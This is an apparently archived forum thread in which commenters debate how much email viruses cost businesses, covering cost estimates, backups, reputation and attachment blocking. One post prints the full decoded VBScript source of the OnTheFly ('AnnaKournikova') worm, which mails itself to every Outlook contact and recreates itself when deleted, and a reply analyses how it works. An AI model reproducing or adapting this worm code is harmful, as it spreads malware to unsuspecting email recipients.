• A bunch of other people noticed the same thing, and started yelling over the cubes, "Hey, there's a virus going around, delete it and don't open it!"
• Everyone did.

So, I guess you could call that a loss of 10 or 15 minutes of "productivity" for everyone in the company. Oh no, 10 man-hours lost! And at our billing rate...!

But frankly, not everyone was working anyway. There's at least as much time lost every day to reading online news and talking to friends, not to mention waiting for conference calls, etc etc. The impact was totally negligible, unless this virus had some nasty side effect of deleting all the files on someone's harddrive.

The cost isn't because of viri it's from ...

[|deity|]

... poor software. I think windows should say on the box "insecure by default". Any network program that is designed for end users and not computer geeks should have safety built in. I can see a flaw slipping by the programmers that would allow a worm or security breach. I can't imagine selling a product that is so insecure that anyone with a little experiance can sit down and write a worm/virus/script to exploit, then never admit that the product was flawed.

Maybe these companies should be able to sue Microsoft, for lost time and money.

ANSWER: Where these numbers come from!

[swordgeek]

Here's an example.

Small company of 100 people, open 250 days/year.
Annual GROSS income $5 million.
$5m/250days/8hours = $2500/hr.

Virus comes in, hits 24 people.
Sysadmin can fix a machine in 15 minutes, making for six hours of work. That's $15000 in lost revenue!!! Then add on the salary for the sysadmin and the staff when they're not working, and you've got 12hr at $50/hr (average salary,
including the CEO, who makes $2million in stock options), or another $600. Wow, almost $16k for a small company!!! (interesting aside: $16000/24 people comes to $666/person :-> )

Now, let's look at this rationally. The sysadmin (a) can probably do several machines simultaneously, and (b) is already getting paid for this sort of thing. It's his job! Then there's the staff, who for their 15 minutes of downtime might take their allotted coffee break, or maybe even do some (gasp!) paperwork!

For non-destructive viruses, I would guess the average cost to be about $5/seat infected. A far cry from the $666/seat calculated above. Here are some of the flaws that lead to this discrepancy:

1) All work time is computer time for all staff infected.
2) Time spent repairing the damage is outside of normal duties for the admin.
3) All staff work at 100% efficiency all of the time.
4) Time spent repairing the damage can't be done when the staff aren't around.

In other words, the numbers quoted are nothing more than so much bullshit.

Re:OnTheFly Source

[zootie]

You figured it out. It adds the registry entry to know if the system has been infected before, then e-mails itself to everybody in your address list. If it is Jan 26th, it opens that web page. Yes, it's weird that it tries to open that web page in the past, but who knows (maybe the author released it in the wild back then, and only now hit corporate servers).

McAfee seems to detect it (I'm not sure if by heuristics or if it has the signature), but Norton AntiVirus doesn't detect it...

What's interesting is how it decodes itself from the string. I kind of remember a couple VBS virus doing that earlier.

It could be much worse. Many of these script viruses could be enhanced so the vbs extension doesn't show, and to use a variable encoding keys, which would make it harder to create signatures.

Re:How much do virus *myths* cost businesses?

[micromoog]

This isn't caused by virus myths per se, it's caused by lack of user education.

Any time you have an incident like this, go see the user personally with a pair of handcuffs and a 2x4. Gradually, as users become more enlightened about IS policy, you will see a decrease in these types of messages.

Re:The real cost of viruses...

[update()]

Hmm...what you're saying is that viruses shouldn't cost you anything because full backups should be instantly available. That's true, but the fact is that they aren't. For one thing, when a virus spreads during the day (which it will) that day's work is lost as you go back to the previous night's backup, or the one before that, to be on the safe side. And that's the best case scenario -- I have yet to work in a place where that's really what would happen. In all my workplaces, people would have lost weeks of work, or maybe everything. And that's not even mentioning the idiot admin who refused to give me a restore because of some turf squabble with a rival.

Hey, street crime wouldn't cost anything if people all stayed inside.

Stupidity

[clinko]

This Is pretty funny and related to the topic. It's a map of where virus'? viri? whatever... attack...
Basically A map of stupidity...
Is Your State Stupid?

Re:Stupidity

[Tower]

Further proof that nobody in North Dakota owns a computer... and if they did, they would still need phone lines to connect and get a virus.
--

viruses cost me my sanity

[omega_rob]

I don't think I've personally lost much in the way of time or effort as a result of a virus, although I've seen my employer get burned a few times (notably with the "I Love You" bug).

Mostly I've been losing my freaking sanity from listening to my uber-geeky previous boss trying to "keep on top" of each virus. He does his own insightful analysis of the thing ("a-ha!this attachment is really a VB script!") He scours the web, digging up all the information that's readily available to anyone who wants to look for it, then spams the entire team for days on end with a torrent of "informative" e-mails that put the original virus to shame.

I bet you all have this same guy working in your office. Admit it, it's probably you.

omega_rob -- friend of the bonsai kitten

How could it *not* cost a lot of money?

[Ben+Schumin]

If you don't understand how this could cost money, you've obviously never worked in a large corporate environment. An example, a company I worked at got an email vbs "virus" recently. Let's count out where the money comes from.

• Thousands of users receive thousands of messages in their email box.
• MIS has to go to 'infected' machines and clean each of them.
• MIS has less time to address other important issues, blocking other people from completing tasks.
• While MIS is fixing a machine, that user is less productive, if not completely unproductive.
• Some users have unbacked up important data on their machines. This data can be destroyed. If someone worked on a project for two days, you're talking 16 hours of paid work lost completely. Multiply this across the entire organization.
• Prevention costs: Site licenses or per user licenses for virus scanning solutions are expensive and rarely catch new vbs viruses.
• Small businesses are also hit hard, because often there is no one at the location who has aclue what to do about the problem, so they have to hire some overpriced consultant to run a virus scan and clean their machines for them.

It's not all that complicated of a concept, why do you need it broken down for you? Some Linux users are so naive about the real world.

"Loss" == "IRS allows you to write it off".

I consider a financial "loss" to be anything which I can claim on my taxes at the end of the year. Nothing else constitutes real loss.

Therefore things like software piracy, virus attacks, are not losses.

Why is it that Microsoft PR execs speak of the "billions of dollars lost because of piracy" yet the accoutanta don't report dollar one to the IRS or to the shareholders? I don't see MS claiming a loss when software sits unsold on a shelf in a warehouse. Yet have someone who can't afford nor ever would have paid for software to install Office or Windows on their machine and thay claim that's a $500 or $90 loss. Bullshit. Just like with movie theaters. Unsold empty seats are not a loss. But if kids sneak into those seats, all of a sudden it is, and a full fare loss too? Bullshit. Viruses cost time and are therefore a financial loss? Then MS must be responsible for loss when windows freezes up or crashes, right? Rules apply equally to everything or they mean squat.

If it's a loss, tell it to the IRS. Can't do that? Then shut up, because it's not a real loss.

The real cost of viruses...

[jd]

...is zero.

The main element in any calculation of this kind is "time", which is usually calculated in terms of the amount the company/person would charge to do X number of hours work, for an outside agency.

This assumes, however, that the person is both sitting at their desk doing "regular" work, AND cleaning up the virus.

So, if you want a more realistic assessment, you must first take out duplicate entries on your balance sheet.

Then there's the cost of replacing data and software. Ummm, if you're doing regular backups (which you should), this'll be the cost of doing a restore from backup. Which is already factored into the system admin's pay, so (again) is a duplicate entry.

There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.

Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.

Something to keep in mind...

[dmuth]

Is that getting accurate figures, at least from anti-virus companies/agencies, is going to be difficult. After all, the more serious they play out the problem to be, the more people are going to buy their products.

Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected, which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.

</rant>

--

What does reputation cost?

[Ralph+Wiggam]

A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.

-B

Opportunity cost

[Ungrounded+Lightning]

Viruses are probably even MORE costly. Consider:

- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.

and so on.

Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.

Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.

Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.

Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.

(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)

Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.

Computing the PROVABLE direct loss is another story entirely.

Re:How much do virus *myths* cost businesses?

[donutello]

Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!

OnTheFly Source

[zootie]

I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string

<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFolde r(0)& "\AnnaKournikova.jpg.vbs"
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname, True)
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have, ;o)"
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>

It can cost a lot...

[NetJunkie]

It can cost a lot when a business gets hit hard by a virus..but it shouldn't.

Take today for example..that big new scary .vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.

As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.

If you're not blocking .vbs files TODAY, you need to be asking why not.

Virus cost:

[SpanishInquisition]

Windows ME sells for 169.99 at Amazon.com

How much do virus *myths* cost businesses?

[tenzig_112]

That's the real question.

As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.

argh!